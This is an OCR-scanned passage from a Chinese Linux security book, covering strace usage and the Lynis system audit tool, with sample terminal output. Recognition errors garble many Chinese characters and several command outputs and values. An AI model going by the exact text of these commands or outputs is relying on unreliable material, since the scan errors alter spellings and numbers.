在 使 用 lsof 时 还 有 更 多 的 选项 ， 具 体 可 以 参考 lsof 命 令 的 帮助 页 面 。 


原理 解析 


运行 |sof 命 令 将 显示 系统 上 所 有 打开 文件 的 列表 。 使 用 “-u” 选 项 并 指定 用 尸 名 ， 获 取 特定 用 尸 的 打开 文件 列表 。 
当 使 用 “-i” 选 项 并 指定 端口 号 时 ， 可 获取 有 天 该 端口 上 运行 的 所 有 进程 的 信息 。 


当 “- ”和 “-u” 选 项 与 特定 用 户 名 一 起 使 用 时 ， 我 们 可 获取 该 用 户 正 在 访问 的 文件 和 命令 的 相关 信息 。 


10.8 ”使 用 系统 工具 strace 


在 Linux 机 器 上 运行 任何 命令 或 程序 时 ， 你 可 能 想 知道 它 的 后 台 工 作 是 怎样 的 。 在 Linux 中 有 一 个 非常 有 用 的 工具 叫 strace,， 


可 以 解决 这 个 问题 。 


这 是 一 个 命令 行 工 具 ， 还 可 以 用 作 诊 断 或 调试 工具 。strace 能 监视 进程 和 Linux 内 核 之 间 的 交互 ， 当 要 调试 程序 的 执行 
时 ，strace 工 具 很 有 帮助 。 


准备 工作 
所 有 基于 Linux 的 系统 默认 都 提供 此 工具 。 因 此 ， 不 需要 进行 其 他 的 配置 即 可 开始 使 用 strace 工 具 。 
操作 指南 


下 面 我 们 看 看 如 何以 各 种 方式 使 用 strace 从 头 到 尾 跟踪 任何 程序 的 执行 情况 。 


1. 要 在 Linux 中 跟踪 任何 可 执行 命令 的 执行 情况 ， 只 需 运行 strace 命 令 ， 后 面 加 上 可 执行 命令 即 可 。 人 例如， 如果 对 ls 命令 使 用 
strace， 将 得 到 以 下 输出 : 


rootütj-dev:-4 strace ls 

execve( "/bin/ls", ["1s"], [/* 39 vars */]) = 9 

brk(8) = 0x81d7080 

access("/etc/ld.so.nohwcap", F OK) - -1 ENOENT (No such file or directory) 
mmap2(NULL, 8192, PROT READ|PROT WRITE, MAP PRIVATE|MAP ANONYMOUS, -1, 0) = Oxb77cf600 


access("/etc/ld.so.preload", R OK) - -1 ENOENT (No such file or directory) 
open("/etc/ld.so.cache", O RDONLY|O CLOEXEC) = 3 

fstat64(3, (st mode-S IFREG|80644, st size-62788, ...}) = O 

mmap2(NULL, 62788, PROT READ, MAP PRIVATE, 3, 0) = 9xb77bf699 

close(3) = 由 


2. 上 图 所 显示 的 输出 已 被 截断 。 如 果 检 查 输出 的 最 后 几 行 ， 可 以 看 到 一 些 写 (write) 系统 调用 ， 对 应 于 列表 当前 目录 命令 
向 屏幕 显示 结果 的 操作 


fstat64(1, [st mode-S IFCHR|[0620, st_rdev=makedev(136, 8), ...})=0 

mmap2(NULL, 4096, PROT READ|PROT WRITE, MAP PRIVATE|MAP ANONYMOUS, -1, 8) = 0xb777a000 

write(1, "Desktop Documents Downloads e"..., 91Desktop Documents Downloads examples.desktop Music 
Pictures Public Templates Videos 


munmap(0xb777a000, 4096) 
close(2) 
exit group(8) 


3. 为 了 检查 列表 ， 我 们 在 同一 目录 中 单独 运行 Is 命令 。 会 看 到 与 上 图 中 相同 的 列表 : 


root@tj-dev: /home/tajinder# ls 
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos 
rootQtj-dev:/home/tajinderi 国 


4. 如 果 要 将 strace 命 令 的 统计 结果 简洁 地 显示 出 来 ， 可 以 使 用 “-c” 选项 : 


strace -c ls 


HEARDI, RASELA Piet: 


root@tj]-dev: /home/tajinder# strace -c ls 
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos 
seconds usecs/call errors syscall 


-000000 
- 000000 
000000 
000000 
,8800000 execve 


. 000000 access 
. 000000 brk 
-. 000000 ioctl 


000000 munmap 

000000 uname 

000000 mprotect 
000000 rt sigaction 

. 000000 rt sigprocmask 
. 000000 getrlimit 

- 000000 mmap2 


5. 我 们 还 可 以 使 用 “-t” 选 项 在 每 个 输出 行 的 开始 处 显示 时 间 惟 : 


root(itj-dev:/home/tajinders& strace -t ls 
execve("/bin/ls", ["1s"], [/* 39 vars */]) = 6 
brk(8) = 0x8462000 
access("/etc/ld.so.nohwcap", F OK) = -1 ENOENT (No such file or directory) 
mmap2(NULL, 8192, PROT READ|PROT WRITE, MAP PRIVATE|MAP ANONYMOUS, -1, O8) = Oxb778f000 
access("/etc/ld.so.preload", R OK) - -1 ENOENT (No such file or directory) 


open("/etc/ld.so.cache", O RDONLY|O CLOEXEC) = 3 

fstat64(3, {st mode-S IFREG|0644, st size-62788, ...}) - 0 

mmap2(NULL, 62788, PROT READ, MAP PRIVATE, 3, 0) = 0xb777f000 

close(3) -8 

access("/etc/ld.so.nohwcap", F OK) - -1 ENOENT (No such file or directory) 
open("/lib/1386-linux-gnu/libselinux.so.1", O RDONLY|O CLOEXEC) = 3 


6. 默 认 的 strace 命 令 显 示 可 执行 程序 执行 的 所 有 系统 调用 。 如 果 只 想 显示 某 个 特定 的 调用 ， 可 以 使 用 “-e” 选 项 。 所 以 ,如 


果 只 想 看 到 “ls” 命令 的 open 系 统 调用 ， 必 须 运 行 下 述 命令 : 
strace -e open ls 


上 述 命令 运行 时 ， 我 们 得 到 以 下 输出 : 


root(ütj-dev:/home/tajinderz strace -e open ls 
open("/etc/ld.so.cache", O RDONLY|O CLOEXEC) = 3 
open("/lib/i386-linux-gnu/libselinux.so.1", O RDONLY|O CLOEXEC) 
open("/lib/i386-linux-gnu/librt.so.1", O RDONLY|O CLOEXEC) - 3 
open("/lib/i386-linux-gnu/libacl.so.1", O RDONLY|O CLOEXEC) - 
open("/lib/i386-linux-gnu/libc.so.6", O RDONLY|O CLOEXEC) = 3 
open("/lib/i386-linux-gnu/libdl.so.2", O RDONLY|O CLOEXEC) = 3 
open("/lib/i386-linux-gnu/libpthread.so.0", O RDONLY|O CLOEXEC) 
open("/lib/i386-linux-gnu/libattr.so.1", O RDONLY|O CLOEXEC) - 3 
open("/proc/filesystems", O RDONLY|O LARGEFILE) = 3 
open("/usr/lib/locale/locale-archive", O RDONLY|O LARGEFILE|O CLOEXEC) = 3 
Desktop Downloads Music Pictures Templates 

Documents  examples.desktop output Public Videos 


3 


7. 如 果 和 希望 将 strace 命 令 的 输出 保存 到 文件 中 以 便 稍 后 查看 ， 可 以 使 用 “-o” 选项 : 
strace -o output.txt ls 
这 里 ，output.txt 是 要 保 仓 strace 命 令 输 出 的 文件 名 : 


root@tj-dev: /home/tajinder# strace -o output.txt ls 

Desktop Downloads Music Pictures Templates 

Documents examples.desktop output.txt Public Videos 
root@tj-dev:/home/tajinder# cat output.txt 

execve("/bin/ls", ["ls"], [/* 39 vars */])= 6 

brk(8) = 0x8dbco0600 
access("/etc/ld.so.nohwcap", F. OK) - -1 ENOENT (No such file or directory) 


mmap2(NULL, 8192, PROT READ|PROT WRITE, MAP PRIVATE|MAP ANONYMOUS, -1, ©) = Oxb76 
fa0080 

access("/etc/ld.so.preload", R OK) = -1 ENOENT (No such file or directory) 
open("/etc/ld.so.cache", O RDONLY|O CLOEXEC) - 3 

fstat64(3, (st mode-S IFREG|0644, st size-62788, ...)) = 0 

mmap2(NULL, 62788, PROT READ, MAP PRIVATE, 3, 0) = Oxb76ea800 

close(3) zB 


SE: 如 果 我 们 想 对 当前 正在 运行 的 进程 使 用 strace 工 具 ， 可 以 通过 进程 ID 来 执行 此 操作 。 在 本 例 中 ， 我 们 使 用 的 是 


firefox 进 程 ， 其 进程 ID 为 16301。 


8. 运 行 以 下 命令 ， 并 使 用 “-o” 选 项 将 命令 的 输出 保存 在 firefox_output.txt 文 件 中 : 


root@tj-dev:~# strace -p 16301 -o firefox output.txt 


Process 163081 attached - interrupt to quit 
Process 16301 detached 


9. 我 们 可 以 随后 使 用 tail 命 令 ， 或 选择 任意 文本 编辑 器 来 检查 输出 文件 的 内 容 。 


原理 解析 


当 对 任何 其 他 Linux 命 令 或 程序 使 用 strace 命 令 时 ， 它 会 跟踪 命令 或 程序 与 Linux 内 核 的 交互 。 
当 使 用 “-c” 选 项 时 ,我 们 将 得 到 统计 摘要 ， 如 果 使 用 了 “-t” 选 项 ,将 在 每 个 输出 行 之 前 显示 时 间 截 。 


使 用 “-e” 选项， 我 们 仅 看 到 程序 执行 的 特定 调用 ， 例 如 open 系 统 调 用 。 使 用 “-o” 选项 ， 可 以 将 strace 命 令 的 输出 写 入 
指定 文件 。 


10.9 ”使 用 Lynis 


手动 监控 Linux 上 的 日 志文 件 是 一 件 非 营 繁 珊 的 工作 。 为 了 方便 起 见 ， 可 以 使 用 Linux 系 统 上 的 审计 工具 ， 这 类 工具 能 够 目 动 
扫 摘 整个 系统 并 上 友 现 任何 安全 问题 。 


Lynis 易 于 使 用 ， 并 且 可 以 在 更 息 的 时 间 内 获得 安全 报告 。 这 在 扫 摘 Linux 系 统 的 漏洞 和 恶意 软件 时 非 营 有 用 。 
准备 工作 

要 使 用 Lynis， 一 般 不 需要 进行 安 丢 。 但 是 如 果 你 使 用 的 是 Ubuntu 系统 ， 可 以 使 用 下 面 的 命令 安 疼 Lynis 软 件 包 : 

apt-get install lynis 

当 上 述 命令 运行 时 ， 得 到 以 下 输出 : 


root@kalıi:~# apt-get install Lynis 
Heading package lists... Done 


Building dependency tree 
Reading state information... Done 
ynis is already the newest version (2.1.1-1). 


对 于 其 他 Linux 皮 行 版 本 ， 只 需 从 https://cisofy.com/downloadyVlynis/ 下 载 软件 包 。 下 载 后 ， 你 只 需要 执行 ./lynis audit 


system， 扫 摘 即 可 开始 。 
使 用 Lynis 非 党 简单 。 只 需 局 动 扫 摘 进 程 ， 一 切 都 将 自动 完成 。 现 在 来 研究 这 个 工具 的 工作 机 制 |: 


1. 要 局 动 扫 搞 ， 只 需 键 入 以 下 合 令 : 


当 上 述 命令 运行 时 ， 得 到 以 下 输出 : 
root@kall:~# lynis -c 


[ Lynls 2.1.1 ] 


TERERETERERETETETETETETETETETETETETETRERERERETEHETEIETEE THEE HERERERETAERERETAETAETRERE IEEE RETE TETETRETETETRERETERETERHEHTHHIHHHHHH EHE EE E E E E E I I A E 
# 
Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are 
welcome to redistribute it under the terms of the GNU General Public License. 

See the LICENSE file for details about using this software. 


Copyright 200/-2015 - CISOfy, https://cisofy.com 
Enterprise support and plugins available via CISOfy 


区 
E 


[+] Initializing program 


Program version: 

Operating system: 

Operating system name: 

Operating system version: Kali Linux Rolling 


2. 一 旦 运行 上 述 命令 ， 扫 摘 融 开始 并 将 持续 一 段 时 间 ， 具 体 时 间 取 决 于 系统 上 可 找到 的 软件 包 。 扫 摘 包 括 不 同 的 部 分 ， 如 系 
统 工具 、 内 核 、 文 件 系统 等 。 


3. 扫 摘 完 成 后 ， 可 以 在 屏幕 末尾 看 到 输出 的 详细 信息 的 概 蜗 : 


Lynis security scan details: 


Hardening index : 56 [IHHHHHHHHHHE 
[ests performed : 201 
Plugins enabled : 1 


Quick overview: 
- Firewall [X] - Malware scanner [V] 


Lynis Modules: 
- Heuristics Check [NA] - Security Audit [V] 
- Compliance Tests [X] - Vulnerability Scan [V] 


Files: 
- Test and debug information : /var/log/lynis.log 
- Report data : /var/log/lynis-report.dat 


4. 完 成 扫 摘 后 ， 会 生成 报告 并 保存 在 /var/log/lynis.log 文 件 中 。 当 我 们 读 取 这 个 文件 的 内 容 时 ， 将 得 到 一 个 类 似 以 下 所 示 的 


:42] 

:42] 

:42] ### Copyright 2007-2015 - CISOfy, https://cisofy.com ### 
:42] Program version: P don MR d 

:42] Operating system: Be yh 

:42] Operating system name: Debian 

:42] Operating system version: Kali Linux Rolling 


Kernel version: 4.3.0 

Kernel version (full): 4.3.0-kalil-686-pae 
Hardware platform: 1686 

Hostname: kali 

Auditor: [Unknown] 

Profile: /etc/lynis/default.prf 
Log file: /var/log/lynis.log 

Report file: /var/log/lynis-report.dat 
Report version: 


Include directory: /usr/share/lynis/include 
Plugin directory: /etc/Lynis/plugins 


5. 我 们 可 以 滚动 日 志文 件 ， 查 看 Lynis 已 经 执行 了 哪些 测试 。 


6. 在 上 述 这 份 报告 中 ， 需 要 我 们 关注 的 是 包 合 “Warning” 的 条 目 。 可 以 运行 以 下 命令 来 查找 报表 中 所 有 包含 该 单词 的 行 ; 


grep Warning /var/log/lynis.log 


当 上 述 命令 运行 时 ， 得 到 以 下 输出 : 


Performing test ID NEIW-2/05 (Check availability two nameservers) 


Result: less than 2 responsive nameservers found 
Warning: Couldn't find 2 responsive nameservers [NETW-27/05] 
Note: Non responsive nameservers can give problems for your system($ 


7. 同 样 ， 我 们 可 以 使 用 以 下 命令 找到 Lynis 给 出 的 所 有 "Suggestion" 列表 : 
grep Suggestion /var/log/lynis.log 
当 上 述 命令 运行 时 ， 得 到 以 下 输出 : 


:13:24] Performing test ID FIRE-4590 (Check firewall status) 

:13:24] Result: no host based firewall/packet filter found or configured 
20:13:24] Buggestion: Configure a firewall/packet filter to filter incoming a$ 
20:13:24] Hardening: assigned 0 hardening points (max for this item: 5), curr$ 


8. 我 们 还 可 以 通过 在 /varvlogVlynis.log 文 件 中 滩 动 到 报告 的 结尾 来 查看 “Warning” 和 "Suggestion" 。 会 看 到 类 似 以 下 


显示 的 结果 : 
-[ Lynis 2.1.1 Results ]- 


Warninqgs: 


- Can't find any security repository in /etc/apt/sources.list or sources.list 


.d directory [PKGS-7388] 
https://cisofy.com/controls/PKGS -/388/ 


- Couldn't find 2 responsive nameservers [NETW-2705] 
https://cisofy.com/cont rol S/NETW-2705/ 


Suggestions: 


- Install libpam-tmpdir to set $TMP and $TMPDIR for PAM sessions [CUST-0280] 


https://your-domain.example.org/cont rol s/CUST -0280/ 
- Install libpam-usb to enable multi-factor authentication for PAM sessions [ 
CUST -0285] 
https://your-domain.example.org/cont rol s/CUST -0285/ 
- Install 'ecryptfs-utils' and configure for each user. [CUST -0520] 
https://your-domain.example.org/cont rol s/CUST -0520/ 


原理 艇 本 


可 以 通过 执行 lynis-c 命 令 来 启动 Lynis 扫 描 。 扫 描 过 程 中 无 需 进 行 任何 操作 。 
扫 摘 完成 后 ， 报 告 将 保存 在 /var/log/lynis.log 文 件 中 。 


我 们 要 在 报告 中 找到 包含 “Warning” 和 “Suggetion” 单 词 的 行 ， 因 为 根据 Lynis 的 要 求 ， 这 些 行 是 需要 特别 注意 的 。 


